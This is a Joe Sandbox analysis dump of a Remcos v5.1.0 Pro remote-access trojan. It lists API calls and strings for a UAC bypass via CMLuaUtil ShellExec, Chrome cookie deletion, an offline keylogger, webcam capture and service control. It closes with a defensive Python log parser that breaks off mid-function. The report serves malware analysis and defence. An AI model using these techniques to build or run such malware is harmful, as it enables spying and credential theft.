                  • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                  • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                  • Opcode Fuzzy Hash: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                  • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                  APIs
                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                  • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                  • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                  Strings
                  • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleOpen$FileRead
                  • String ID: http://geoplugin.net/json.gp
                  • API String ID: 3121278467-91888290
                  • Opcode ID: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                  • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                  • Opcode Fuzzy Hash: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                  • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                  APIs
                    • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                  • _free.LIBCMT ref: 00450F48
                    • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                  • _free.LIBCMT ref: 00450F53
                  • _free.LIBCMT ref: 00450F5E
                  • _free.LIBCMT ref: 00450FB2
                  • _free.LIBCMT ref: 00450FBD
                  • _free.LIBCMT ref: 00450FC8
                  • _free.LIBCMT ref: 00450FD3
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                  • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                  • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                  APIs
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                  • int.LIBCPMT ref: 00411183
                    • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                    • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                  • std::_Facet_Register.LIBCPMT ref: 004111C3
                  • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                  • String ID: (mG
                  • API String ID: 2536120697-4059303827
                  • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                  • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                  • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                  • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                  APIs
                    • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                    • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                    • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32 ref: 004135E7
                    • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                  • StrToIntA.SHLWAPI(00000000), ref: 0041B33C
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCurrentOpenProcessQueryValue
                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                  • API String ID: 1866151309-2070987746
                  • Opcode ID: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                  • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                  • Opcode Fuzzy Hash: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                  • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                  APIs
                  • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                  • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  • Opcode ID: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                  • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                  • Opcode Fuzzy Hash: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                  • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                  APIs
                  • CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0
                    • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                    • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                  • CoUninitialize.OLE32 ref: 00407629
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: InitializeObjectUninitialize_wcslen
                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                  • API String ID: 3851391207-3324213274
                  • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                  • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                  • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                  • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                  APIs
                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                  • GetLastError.KERNEL32 ref: 0040BAE7
                  Strings
                  • [Chrome Cookies not found], xrefs: 0040BB01
                  • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                  • UserProfile, xrefs: 0040BAAD
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteErrorFileLast
                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  • API String ID: 2018770650-304995407
                  • Opcode ID: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                  • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                  • Opcode Fuzzy Hash: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                  • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                  APIs
                  • AllocConsole.KERNEL32 ref: 0041CDA4
                  • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Console$AllocOutputShowWindow
                  • String ID: Remcos v$5.1.0 Pro$CONOUT$
                  • API String ID: 2425139147-1043272453
                  • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                  • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                  • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                  • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044336D
                  • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProc
                  • String ID: CorExitProcess$PkGNG$mscoree.dll
                  • API String ID: 4061214504-213444651
                  • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                  • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                  • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                  • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                  APIs
                  • __allrem.LIBCMT ref: 0043AC69
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                  • __allrem.LIBCMT ref: 0043AC9C
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                  • __allrem.LIBCMT ref: 0043ACD1
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                  • String ID:
                  • API String ID: 1992179935-0
                  • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                  • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                  • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                  • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                  APIs
                  • Sleep.KERNEL32(00000000,?), ref: 004044C4
                    • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: H_prologSleep
                  • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                  • API String ID: 3469354165-3054508432
                  • Opcode ID: 92d61490a4b2957e555669ba2acdc23e21a020ddb9508585be9bb95eb31fcb07
                  • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                  • Opcode Fuzzy Hash: 92d61490a4b2957e555669ba2acdc23e21a020ddb9508585be9bb95eb31fcb07
                  • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                  APIs
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: __cftoe
                  • String ID:
                  • API String ID: 4189289331-0
                  • Opcode ID: bc22737b9e07c01bfe43bbe439fdc0bac90f3fb6b0d8d7516700c90120c40b46
                  • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                  • Opcode Fuzzy Hash: bc22737b9e07c01bfe43bbe439fdc0bac90f3fb6b0d8d7516700c90120c40b46
                  • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                  • String ID:
                  • API String ID: 493672254-0
                  • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                  • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                  • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                  • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: __alldvrm$_strrchr
                  • String ID: PkGNG
                  • API String ID: 1036877536-263838557
                  • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                  • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                  • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                  • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                  APIs
                  • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                  • _free.LIBCMT ref: 0044824C
                  • _free.LIBCMT ref: 00448274
                  • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                  • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                  • _abort.LIBCMT ref: 00448293
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$_free$_abort
                  • String ID:
                  • API String ID: 3160817290-0
                  • Opcode ID: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                  • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                  • Opcode Fuzzy Hash: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                  • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseHandle$Open$ControlManager
                  • String ID:
                  • API String ID: 221034970-0
                  • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                  • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                  • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                  • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseHandle$Open$ControlManager
                  • String ID:
                  • API String ID: 221034970-0
                  • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                  • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                  • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                  • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseHandle$Open$ControlManager
                  • String ID:
                  • API String ID: 221034970-0
                  • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                  • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                  • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                  • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: PkGNG
                  • API String ID: 0-263838557
                  • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                  • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                  • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                  • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                  APIs
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                  • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                  • CloseHandle.KERNEL32(?), ref: 00404DDB
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                  • String ID: PkGNG
                  • API String ID: 3360349984-263838557
                  • Opcode ID: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                  • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                  • Opcode Fuzzy Hash: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                  • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                  APIs
                  • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                  • wsprintfW.USER32 ref: 0040B1F3
                    • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: EventLocalTimewsprintf
                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                  • API String ID: 1497725170-248792730
                  • Opcode ID: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                  • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                  • Opcode Fuzzy Hash: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                  • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
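The record above shows the offline keylogger building its session header with wsprintfW from the format string "[%04i/%02i/%02i %02i:%02i:%02i " followed by "Offline Keylogger Started" and "]", and the earlier records show the log being opened, sized and appended to. The following is an added example, not code from this report or from Remcos: a triage parser for a recovered log of that shape. It assumes each header is followed by captured text up to the next header, decodes the file as UTF-16 only when the bytes look wide (an assumption drawn from the wide-string API in the dump, not something the report states), and the sample log is constructed.

```python
"""Triage helper for a recovered Remcos offline-keylogger log. The header
format is inferred from the wsprintfW format string in the dump:
"[YYYY/MM/DD HH:MM:SS <label>]", with captured keystrokes following until the
next header. Added example, not code from the report or from Remcos; the
UTF-16 handling is an assumption and SAMPLE_LOG is constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime
from typing import List

# Header as wsprintfW would emit it from "[%04i/%02i/%02i %02i:%02i:%02i " + label + "]".
HEADER_RE = re.compile(
    r"\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) ([^\]\r\n]+)\]"
)


@dataclass
class Session:
    started: datetime
    label: str
    text: str


def decode_log(data: bytes) -> str:
    """Decode as UTF-16 when the file carries a BOM or the interleaved-NUL
    pattern of wide ASCII, otherwise as UTF-8. Never abort on bad bytes."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16", errors="replace")
    probe = data[:512]
    if probe and probe[1::2].count(0) > len(probe) // 4:
        return data.decode("utf-16-le", errors="replace")
    return data.decode("utf-8", errors="replace")


def parse_sessions(text: str) -> List[Session]:
    """Split the log at valid headers. A header with an impossible date
    (e.g. month 13) is kept as captured text, not used as a boundary."""
    heads = []
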